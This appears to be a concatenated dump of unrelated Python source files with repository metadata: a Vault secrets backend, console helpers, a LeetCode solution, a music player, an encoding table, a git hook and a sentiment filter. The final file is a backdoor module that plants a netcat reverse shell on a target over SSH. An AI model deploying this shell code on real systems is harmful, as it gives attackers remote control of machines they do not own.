|
# Copyright 2019 The Kapitan Authors
# SPDX-FileCopyrightText: 2020 The Kapitan Authors <kapitan-admins@googlegroups.com>
#
# SPDX-License-Identifier: Apache-2.0
"hashicorp vault kv secrets module"
import base64
import logging
import os
from binascii import Error as b_error
from sys import exit
from kapitan import cached
from kapitan.errors import KapitanError
from kapitan.refs.base import RefError
from kapitan.refs.base64 import Base64Ref, Base64RefBackend
import hvac
from hvac.exceptions import Forbidden, InvalidPath
logger = logging.getLogger(__name__)
class VaultError(KapitanError):
"""Generic vault errors"""
pass
def get_env(parameter):
"""
The following variables need to be exported to the environment or defined in inventory.
* VAULT_ADDR: url for vault
* VAULT_SKIP_VERIFY=true: if set, do not verify presented TLS certificate before communicating with Vault server.
* VAULT_CLIENT_KEY: path to an unencrypted PEM-encoded private key matching the client certificate
* VAULT_CLIENT_CERT: path to a PEM-encoded client certificate for TLS authentication to the Vault server
* VAULT_CACERT: path to a PEM-encoded CA cert file to use to verify the Vault server TLS certificate
* VAULT_CAPATH: path to a directory of PEM-encoded CA cert files to verify the Vault server TLS certificate
* VAULT_NAMESPACE: specify the Vault Namespace, if you have one
Following keys are used to creates a new hvac client instance.
:param url: Base URL for the Vault instance being addressed.
:type url: str
:param cert: Certificates for use in requests sent to the Vault instance. This should be a tuple with the
certificate and then key.
:type cert: tuple
:param verify: Either a boolean to indicate whether TLS verification should be performed when sending requests to Vault,
or a string pointing at the CA bundle to use for verification.
See http://docs.python-requests.org/en/master/user/advanced/#ssl-cert-verification.
:type verify: Union[bool,str]
:param namespace: Optional Vault Namespace.
:type namespace: str
"""
client_parameters = {}
client_parameters["url"] = parameter.get("VAULT_ADDR", os.getenv("VAULT_ADDR", default=""))
client_parameters["namespace"] = parameter.get(
"VAULT_NAMESPACE", os.getenv("VAULT_NAMESPACE", default="")
)
# VERIFY VAULT SERVER TLS CERTIFICATE
skip_verify = str(parameter.get("VAULT_SKIP_VERIFY", os.getenv("VAULT_SKIP_VERIFY", default="")))
if skip_verify.lower() == "false":
cert = parameter.get("VAULT_CACERT", os.getenv("VAULT_CACERT", default=""))
if not cert:
cert_path = parameter.get("VAULT_CAPATH", os.getenv("VAULT_CAPATH", default=""))
if not cert_path:
raise Exception("Neither VAULT_CACERT nor VAULT_CAPATH specified")
client_parameters["verify"] = cert_path
else:
client_parameters["verify"] = cert
else:
client_parameters["verify"] = False
# CLIENT CERTIFICATE FOR TLS AUTHENTICATION
client_key = parameter.get("VAULT_CLIENT_KEY", os.getenv("VAULT_CLIENT_KEY", default=""))
client_cert = parameter.get("VAULT_CLIENT_CERT", os.getenv("VAULT_CLIENT_CERT", default=""))
if client_key != "" and client_cert != "":
client_parameters["cert"] = (client_cert, client_key)
return client_parameters
def vault_obj(vault_parameters):
"""
vault_parameters: necessary parameters to authenticate & get value from vault, provided by inventory
e.g.:
auth: userpass
VAULT_ADDR: http://127.0.0.1:8200
VAULT_SKIP_VERIFY: false
Authenticate client to server and return client object
"""
env = get_env(vault_parameters)
client = hvac.Client(**{k: v for k, v in env.items() if k != "auth"})
auth_type = vault_parameters["auth"]
# GET TOKEN EITHER FROM ENVIRONMENT OF FILE
if auth_type in ["token", "github"]:
env["token"] = os.getenv("VAULT_TOKEN")
if not env["token"]:
try:
token_file = os.path.join(os.path.expanduser("~"), ".vault-token")
with open(token_file, "r") as f:
env["token"] = f.read()
if env["token"] == "":
raise VaultError("{file} is empty".format(file=token_file))
except IOError:
raise VaultError("Cannot read file {file}".format(file=token_file))
# DIFFERENT LOGIN METHOD BASED ON AUTHENTICATION TYPE
if auth_type == "token":
client.token = env["token"]
elif auth_type == "ldap":
client.auth.ldap.login(username=os.getenv("VAULT_USERNAME"), password=os.getenv("VAULT_PASSWORD"))
elif auth_type == "userpass":
client.auth_userpass(username=os.getenv("VAULT_USERNAME"), password=os.getenv("VAULT_PASSWORD"))
elif auth_type == "approle":
client.auth_approle(os.getenv("VAULT_ROLE_ID"), secret_id=os.getenv("VAULT_SECRET_ID"))
elif auth_type == "github":
client.auth.github.login(token=env["token"])
else:
raise "Authentication type '{auth}' not supported".format(auth=auth_type)
if client.is_authenticated():
return client
else:
raise VaultError("Vault Authentication Error, Environment Variables defined?")
class VaultSecret(Base64Ref):
"""
Hashicorp Vault support for KV Secret Engine
"""
def __init__(self, data, vault_params, **kwargs):
"""
Set vault parameter and encoding of data
"""
self.data = data
self.vault_params = vault_params
super().__init__(self.data, **kwargs)
self.type_name = "vaultkv"
@classmethod
def from_params(cls, data, ref_params):
"""
Return new VaultSecret from data and ref_params: target_name
parameters will be grabbed from the inventory via target_name
"""
try:
target_name = ref_params.kwargs["target_name"]
if target_name is None:
raise ValueError("target_name not set")
target_inv = cached.inv["nodes"].get(target_name, None)
if target_inv is None:
raise ValueError("target_inv not set")
ref_params.kwargs["vault_params"] = target_inv["parameters"]["kapitan"]["secrets"]["vaultkv"]
return cls(data, **ref_params.kwargs)
except KeyError:
raise RefError("Could not create VaultSecret: vaultkv parameters missing")
@classmethod
def from_path(cls, ref_full_path, **kwargs):
return super().from_path(ref_full_path, encrypt=False, **kwargs)
def reveal(self):
"""
Returns decrypted data
"""
# can't use super().reveal() as we want bytes
try:
self.data = base64.b64decode(self.data, validate=True)
except b_error:
exit("non-alphabet characters in the data")
return self._decrypt()
def _decrypt(self):
"""
Authenticate with Vault server & returns value of the key from secret
:returns: secret in plain text
"""
try:
client = vault_obj(self.vault_params)
# token will comprise of two parts path_in_vault:key
data = self.data.decode("utf-8").rstrip().split(":")
return_data = ""
if self.vault_params.get("engine") == "kv":
response = client.secrets.kv.v1.read_secret(
path=data[0], mount_point=self.vault_params.get("mount", "secret")
)
return_data = response["data"][data[1]]
else:
response = client.secrets.kv.v2.read_secret_version(
path=data[0], mount_point=self.vault_params.get("mount", "secret")
)
return_data = response["data"]["data"][data[1]]
client.adapter.close()
except Forbidden:
raise VaultError(
"Permission Denied. "
+ "make sure the token is authorised to access {path} on Vault".format(path=data[0])
)
except InvalidPath:
raise VaultError("{path} does not exist on Vault secret".format(path=data[0]))
if return_data == "":
raise VaultError("'{key}' doesn't exist on '{path}'".format(key=data[1], path=data[0]))
return return_data
def dump(self):
"""
Returns dict with keys/values to be serialised.
"""
return {
"data": self.data,
"encoding": self.encoding,
"type": self.type_name,
"vault_params": self.vault_params,
}
class VaultBackend(Base64RefBackend):
def __init__(self, path, ref_type=VaultSecret, **ref_kwargs):
"init VaultBackend ref backend type"
super().__init__(path, ref_type, **ref_kwargs)
self.type_name = "vaultkv"
|
apache-2.0
| 3,772,391,026,941,438,000
| 38.480349
| 128
| 0.619843
| false
| 3.937718
| false
| false
| false
|
zenieldanaku/pygpj
|
func/core/viz.py
|
1
|
6108
|
# coding=UTF-8
# Viz.py
import os
from math import ceil
from func.core.lang import t, probar_input
def PrepPrint(lista):
imp = ''
lineas = []
for elemento in lista:
imp += str(elemento)+', '
if len(imp) > 75:
lineas.append(imp)
imp = ''
lineas.append(imp)
imprimir = '\n'.join(lineas).rstrip(', ')+'.'
return imprimir
def subselector (prompt,lista,vueltas=1,dos_col=False):
from func.core.config import advt as advertencias
items = []
pool = vueltas
copia = lista *1 # copia de trabajo
for vuelta in range(vueltas):
if vuelta == 0:
paginado = []
for i in range(len(copia)):
if copia[i][0:1] == '\n':
copia[i] = copia[i].strip('\n')
paginado.append('\n'+str(i)+': '+str(t(copia[i])))
else:
paginado.append(str(i)+': '+str(t(copia[i])))
if dos_col == False:
paginar (10,paginado)
else:
paginar_dos_columnas(10,paginado)
while pool > 0:
item = ''
while item == '':
item = input ('\n'+prompt+': ').capitalize()
if item.isnumeric():
item = int(item)
if item in items:
print (t('Ya ha realizado esa selección, intente nuevamente'))
item = ''
elif item not in range(len(copia)):
print(t('La selección es incorrecta, intente nuevamente'))
item = ''
else:
if advertencias == True:
print (t('Ha elegido ')+t(copia[item]),end = '. ')
items.append(item)
pool -= 1
else:
item = probar_input (item,copia)
if item == '':
print (t('La selección es incorrecta, intente nuevamente')+'\n')
elif copia.index(item) in items:
print (t('Ya ha realizado esa selección, intente nuevamente'))
item = ''
else:
if advertencias == True:
print (t('Ha elegido ')+t(item),end = '. ')
items.append(copia.index(item))
pool -= 1
if advertencias == True:
if not input(t('¿Estas seguro? ')+t('[S / N]')+' ').strip().lower().startswith(t('s')):
pool += 1
del items[-1]
if vueltas == 1:
return items[0]
else:
return items
def barra (caracteristicas, alineamiento, raza):
'''Genera la barra superior de previsualización'''
FUE = str(caracteristicas['FUE']['Punt'])
DES = str(caracteristicas['DES']['Punt'])
CON = str(caracteristicas['CON']['Punt'])
INT = str(caracteristicas['INT']['Punt'])
SAB = str(caracteristicas['SAB']['Punt'])
CAR = str(caracteristicas['CAR']['Punt'])
barra = ' | '.join([raza,' '.join([t('FUE'),FUE,t('DES'),DES,t('CON'),CON,
t('INT'),INT,t('SAB'),SAB,t('CAR'),CAR]),
'Al '+alineamiento])
return barra
def paginar (tam_pag,lineas):
'''Sencilla función para mostrar lineas de texto paginadas.'''
for i in range(len(lineas)):
if i == 0:
print()
print (lineas[i])
if lineas[i] != lineas[-1]:
if (i+1) % tam_pag == 0:
input ('\n[Presione Enter para continuar]\n')
#os.system(['clear','cls'][os.name == 'nt'])
def a_dos_columnas(items):
'''Separa una lista de items en dos columnas para paginar en una sola página.'''
c1 = []
c2 = []
for i in range(len(items)):
if i < len(items)/2:
c1.append(items[i])
else:
c2.append(items[i])
if len(c1) > len(c2):
for i in range(len(c1)-len(c2)):
c2.append('')
lineas = []
for i in range(len(c1)):
if len(c1[i]) > 32:
lineas.append(c1[i] +'\t'+ c2[i])
elif len(c1[i]) > 23:
lineas.append(c1[i] +'\t'*2+ c2[i])
elif len(c1[i]) > 15:
lineas.append(c1[i] +'\t'*3+ c2[i])
elif len(c1[i]) > 7:
lineas.append(c1[i] +'\t'*4+ c2[i])
else:
lineas.append(c1[i] +'\t'*5+ c2[i])
return lineas
def paginar_dos_columnas(tam_pag,lista):
pags = ceil((len(lista)/2)/tam_pag)
c1 = [[] for i in range(pags)]
c2 = [[] for i in range(pags)]
j = 0
for i in range(len(lista)):
if i == tam_pag*2*(j+1):
j += 1
if i < tam_pag+(tam_pag*2)*j:
c1[j].append(lista[i])
else:
c2[j].append(lista[i])
if len(c1[-1]) > len(c2[-1]):
for i in range(len(c1[-1])-len(c2[-1])):
c2[-1].append('')
lineas = []
for i in range(pags):
for j in range(len(c1[i])):
if len(c1[i][j]) > 31:
lineas.append(c1[i][j] +'\t'+ c2[i][j])
elif len(c1[i][j]) > 23:
lineas.append(c1[i][j] +'\t'*2+ c2[i][j])
elif len(c1[i][j]) > 15:
lineas.append(c1[i][j] +'\t'*3+ c2[i][j])
elif len(c1[i][j]) > 7:
lineas.append(c1[i][j] +'\t'*4+ c2[i][j])
else:
lineas.append(c1[i][j] +'\t'*5+ c2[i][j])
for i in range(len(lineas)):
if i == 0:
print()
print (lineas[i])
if lineas[i] != lineas[-1]:
if (i+1) % tam_pag == 0:
input ('\n[Presione Enter para continuar]\n')
#os.system(['clear','cls'][os.name == 'nt'])
|
mit
| 1,342,281,639,521,813,200
| 32.659091
| 103
| 0.430984
| false
| 3.290183
| false
| false
| false
|
vivaxy/algorithms
|
python/problems/most_common_word.py
|
1
|
1131
|
"""
https://leetcode.com/problems/most-common-word/
https://leetcode.com/submissions/detail/150204402/
"""
class Solution:
def mostCommonWord(self, paragraph, banned):
"""
:type paragraph: str
:type banned: List[str]
:rtype: str
"""
wordAcc = dict()
for word in paragraph.lower().replace(',', '').replace('.', '').replace('!', '').replace('?', '').replace('\'', '').replace(';', '').split(' '):
if word not in banned:
if word in wordAcc:
wordAcc[word] += 1
else:
wordAcc[word] = 1
maxCount = 0
ans = ''
for word in wordAcc:
count = wordAcc[word]
if count > maxCount:
maxCount = count
ans = word
return ans
import unittest
class Test(unittest.TestCase):
def test(self):
solution = Solution()
self.assertEqual(solution.mostCommonWord(
'Bob hit a ball, the hit BALL flew far after it was hit.', ['hit']), 'ball')
if __name__ == '__main__':
unittest.main()
|
mit
| -3,210,401,791,503,412,000
| 24.704545
| 152
| 0.505747
| false
| 4.097826
| true
| false
| false
|
hanxi/pyfm
|
pyfm.py
|
1
|
2766
|
#!/usr/bin/python
# coding: utf-8
import sys
import os
import threading
import time
import random
import json
import signal
import gst
# 基础类
class MusicBase:
def __init__(self):
self.app_name = 'console_fm'
self.appPath = os.path.realpath(sys.path[0])
jsonStr = open(self.appPath+'/music2type.json').read()
self.music2type = json.loads(jsonStr)
noneType = []
for k in self.music2type.keys():
if len(self.music2type[k])==0:
noneType.append(k)
for v in noneType:
del self.music2type[v]
self.player = gst.element_factory_make('playbin', 'player')
self.event = threading.Event()
self.playing = False
next(self)
bus = self.player.get_bus()
bus.add_signal_watch()
bus.connect('message', self.on_message)
# gst 消息处理
def on_message(self, bus, message):
if message.type == gst.MESSAGE_EOS:
self.next(bus)
# 主线程函数,循环播放
def mainloop(self):
while True:
#print self.title,self.url
self.player.set_property('uri', self.url)
self.player.set_state(gst.STATE_PLAYING)
self.playing = True
# 让线程进入等待状态,等待激活信号
self.event.wait()
self.event.clear()
# 播放/暂停
def pause(self):
if self.playing:
self.player.set_state(gst.STATE_PAUSED)
self.playing = False
print '暂停'
else:
self.player.set_state(gst.STATE_PLAYING)
self.playing = True
print '继续播放'
# 下一首
def next(self):
self.player.set_state(gst.STATE_NULL)
self.event.set()
key = random.choice(self.music2type.keys())
self.title = random.choice(self.music2type[key].keys())
self.url = self.music2type[key][self.title]
print "播放:",self.title
# 开启主播放线程
def run(self):
self.thread = threading.Thread(target=self.mainloop)
self.thread.setDaemon(True)
self.thread.start()
while True:
if not self.thread.isAlive(): break
# 销毁播放器,目前尚未找到结束播放线程的方法
def destroy(self):
self.thread._Thread__stop()
# 主播放Console界面
class MusicMainConsole():
def __init__(self):
self.fm = MusicBase()
self.fm.run()
def sigint_handler(signum, frame):
print ("exit")
sys.exit()
if __name__ == '__main__':
signal.signal(signal.SIGINT, sigint_handler)
signal.signal(signal.SIGTERM, sigint_handler)
random.seed(time.time())
MusicMainConsole()
|
mit
| 7,971,246,647,054,509,000
| 25.02
| 67
| 0.577633
| false
| 3.008092
| false
| false
| false
|
wittrup/crap
|
python/encoding.py
|
1
|
1363
|
N = 0 # character never appears in text
A = 1 # character appears in plain ASCII text
I = 2 # character appears in ISO-8859 text
X = 3 # character appears in non-ISO extended ASCII (Mac, IBM PC)
text_chars = [
# BEL BS HT LF VT FF CR
N, N, N, N, N, N, N, A, A, A, A, A, A, A, N, N, # 0x0X
# ESC
N, N, N, N, N, N, N, N, N, N, N, A, N, N, N, N, # 0x1X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, # 0x2X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, # 0x3X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, # 0x4X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, # 0x5X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, # 0x6X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, N, # 0x7X
# NEL
X, X, X, X, X, A, X, X, X, X, X, X, X, X, X, X, # 0x8X
X, X, X, X, X, X, X, X, X, X, X, X, X, X, X, X, # 0x9X
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, # 0xaX
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, # 0xbX
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, # 0xcX
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, # 0xdX
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, # 0xeX
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I # 0xfX
]
if __name__ == '__main__':
print('\n'.join(str(text_chars[i:i+16]) for i in range(0, len(text_chars), 16)))
|
mit
| -1,026,429,806,372,490,800
| 44.466667
| 81
| 0.405723
| false
| 1.72096
| false
| false
| false
|
elationfoundation/git_hooks
|
pre-commit/python/timestamp.py
|
1
|
1631
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import subprocess
from datetime import datetime
class TestSuite():
def __init__(self):
self.stdout = 0
def run(self, files):
for file_name in files:
try:
self.set_changed(file_name)
except Exception as _ee:
print(_ee)
print("Completed time stamping")
return 0
def system(self, *args, **kwargs):
kwargs.setdefault('stdout', subprocess.PIPE)
proc = subprocess.Popen(args, **kwargs)
out, err = proc.communicate()
return out
def current_time(self):
"""Current date-time"""
return datetime.now().strftime('%Y-%m-%d %H:%M')
def set_changed(self, file_name):
# watching python and lua scripts
if re.search(r"(\.py|\.lua)$", file_name):
# current script text
with open(file_name, 'r') as fd: script = fd.read()
# change modification date
try:
_now = self.current_time()
print(_now)
script = re.sub('(@changed\s*:\s+)\d{4}-\d{2}-\d{2} \d{2}:\d{2}', lambda m: m.group(1) + _now, script)
except Exception as __ee:
print(__ee)
# write back to script
with open(file_name, 'w') as fd: fd.write(script)
# add changes to commit
try:
print(file_name+"'s timestamp updated")
self.system('git', 'add', file_name)
except Exception as _ee:
print(_ee)
return 0
|
gpl-2.0
| 188,132,529,603,103,600
| 30.365385
| 118
| 0.505825
| false
| 3.949153
| false
| false
| false
|
Weihonghao/ECM
|
find_emotion_word.py
|
1
|
1493
|
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
from tqdm import tqdm
import mmap
def whetherEmotion(word, threshold):
analyzer = SentimentIntensityAnalyzer()
sentiment_result = analyzer.polarity_scores(word)
if abs(sentiment_result['compound']) > threshold:
return True
return False
def get_line_number(file_path):
fp = open(file_path, "r+")
buf = mmap.mmap(fp.fileno(), 0)
lines = 0
while buf.readline():
lines += 1
return lines
if __name__ == '__main__':
threshold = 0.5
out = open("/commuter/chatbot/Commuter/data/emotion_vocab.txt",'w')
emotion_word_set = set()
line_number = get_line_number('/commuter/chatbot/Commuter/question.txt')
print(line_number)
f = open("/commuter/chatbot/Commuter/question.txt",'r')
for line in tqdm(f, total=line_number):#f.readlines():
line = line.strip().split()
for each in line:
if whetherEmotion(each, threshold):
emotion_word_set.add(each)
f.close()
#emotion_word_set = set()
f = open("/commuter/chatbot/Commuter/answer.txt",'r')
for line in tqdm(f, total=line_number):#f.readlines():
'''line = line.strip()
if whetherEmotion(line, threshold):
emotion_word_set.add(line)'''
line = line.strip().split()
for each in line:
if whetherEmotion(each, threshold):
emotion_word_set.add(each)
f.close()
for each in emotion_word_set:
out.write(each)
out.write("\n")
out.close()
|
agpl-3.0
| 8,073,913,267,619,536,000
| 30.104167
| 73
| 0.653048
| false
| 3.05317
| false
| false
| false
|
Kkevsterrr/backdoorme
|
backdoors/shell/netcat.py
|
1
|
1739
|
from backdoors.backdoor import *
import time
class Netcat(Backdoor):
prompt = Fore.RED + "(nc) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using netcat backdoor..."
self.core = core
self.options = {
"port" : Option("port", 53920, "port to connect to", True),
}
self.allow_modules = True
self.modules = {}
self.help_text = INFO + "Uses netcat to pipe standard input and output to /bin/sh, giving the user an interactive shell."
def get_command(self):
#command = "echo " + self.core.curtarget.pword + " | sudo -S bash -c \"cat /tmp/f | /bin/bash -i 2>&1 | nc " + self.core.localIP + " %s > /tmp/f\"" % self.get_value("port")
command = "cat /tmp/f | /bin/bash -i 2>&1 | nc " + self.core.localIP + " %s > /tmp/f" % self.get_value("port")
return command
def do_exploit(self, args):
port = self.get_value("port")
target = self.core.curtarget
self.listen(prompt="some")
#input("Enter the following command in another terminal: nc -v -n -l -p %s" % port)
print(GOOD + "Initializing backdoor...")
target.ssh.exec_command("echo " + target.pword + " | sudo -S rm /tmp/f")
time.sleep(.5)
target.ssh.exec_command("mkfifo /tmp/f")
#target.ssh.exec_command("echo " + target.pword + " | sudo -S chmod 222 /tmp/f")
target.ssh.exec_command(self.get_command())
print(GOOD + "Netcat backdoor on port %s attempted." % port)
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit()
|
mit
| 8,729,828,714,688,870,000
| 44.763158
| 180
| 0.564117
| false
| 3.331418
| false
| false
| false
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.